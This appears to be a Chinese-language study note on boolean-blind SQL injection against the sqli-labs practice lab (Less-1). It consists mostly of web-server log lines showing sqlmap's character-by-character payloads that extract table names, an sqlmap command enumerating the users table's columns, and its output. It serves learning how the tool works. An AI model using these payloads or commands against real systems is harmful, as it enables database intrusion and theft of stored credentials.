10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),8,1))>120 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),8,1))>116 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),8,1))>114 AND 'Lsky'='Lsky HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),8,1))>115 AND 'Lsky'='Lsky HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),9,1))>96 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),9,1))>48 AND 'Lsky'='Lsky HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 1,1),9,1))>1 AND 'Lsky'='Lsky HTTP/1.1" 200 670

uagents 表

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),1,1))=114 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),1,1))>64 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),1,1))>96 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),1,1))>112 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),1,1))>120 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),1,1))>116 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),1,1))>118 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),1,1))>117 AND 'BeVS'='BeVS HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),2,1))>96 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),2,1))>112 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),2,1))>104 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),2,1))>100 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),2,1))>98 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),2,1))>97 AND 'BeVS'='BeVS HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),3,1))>96 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),3,1))>112 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),3,1))>104 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),3,1))>100 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),3,1))>102 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),3,1))>103 AND 'BeVS'='BeVS HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),4,1))>96 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),4,1))>112 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),4,1))>104 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),4,1))>100 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),4,1))>102 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),4,1))>101 AND 'BeVS'='BeVS HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),5,1))>96 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),5,1))>112 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),5,1))>104 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),5,1))>108 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),5,1))>110 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),5,1))>109 AND 'BeVS'='BeVS HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),6,1))>96 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),6,1))>112 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),6,1))>120 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),6,1))>116 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),6,1))>114 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),6,1))>115 AND 'BeVS'='BeVS HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),7,1))>96 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),7,1))>112 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),7,1))>120 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),7,1))>116 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),7,1))>114 AND 'BeVS'='BeVS HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),7,1))>115 AND 'BeVS'='BeVS HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),8,1))>96 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),8,1))>48 AND 'BeVS'='BeVS HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 2,1),8,1))>1 AND 'BeVS'='BeVS HTTP/1.1" 200 670

users 表

# chr(117)='u'
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),1,1))=117 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),2,1))=97 AND 'xfEa'='xfEa HTTP/1.1" 200 670

# chr(115)='s'
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),2,1))>96 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),2,1))>112 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),2,1))>120 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),2,1))>116 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),2,1))>114 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),2,1))>115 AND 'xfEa'='xfEa HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),3,1))>96 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),3,1))>112 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),3,1))>104 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),3,1))>100 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),3,1))>102 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),3,1))>101 AND 'xfEa'='xfEa HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),4,1))>96 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),4,1))>112 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),4,1))>120 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),4,1))>116 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),4,1))>114 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),4,1))>113 AND 'xfEa'='xfEa HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),5,1))>96 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),5,1))>112 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),5,1))>120 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),5,1))>116 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),5,1))>114 AND 'xfEa'='xfEa HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),5,1))>115 AND 'xfEa'='xfEa HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),6,1))>96 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),6,1))>48 AND 'xfEa'='xfEa HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:31  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),6,1))>1 AND 'xfEa'='xfEa HTTP/1.1" 200 670

查询 users 表的列名

sqlmap -u "http://10.211.55.3/sqli/Less-1/?id=1" -v 3 --technique=B -D security -T users --columns

sqlmap 返回:

[14:20:38] [INFO] retrieved: varchar(20)
[14:20:38] [DEBUG] performed 76 queries in 0.59 seconds
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

列名的数量

CAST(COUNT(column_name) AS CHAR)统计当前数据库表的数量chr(51)=3

10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),1,1))>51 AND 'yEcN'='yEcN HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),1,1))>48 AND 'yEcN'='yEcN HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),1,1))>49 AND 'yEcN'='yEcN HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:12  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),1,1))>50 AND 'yEcN'='yEcN HTTP/1.1" 200 750

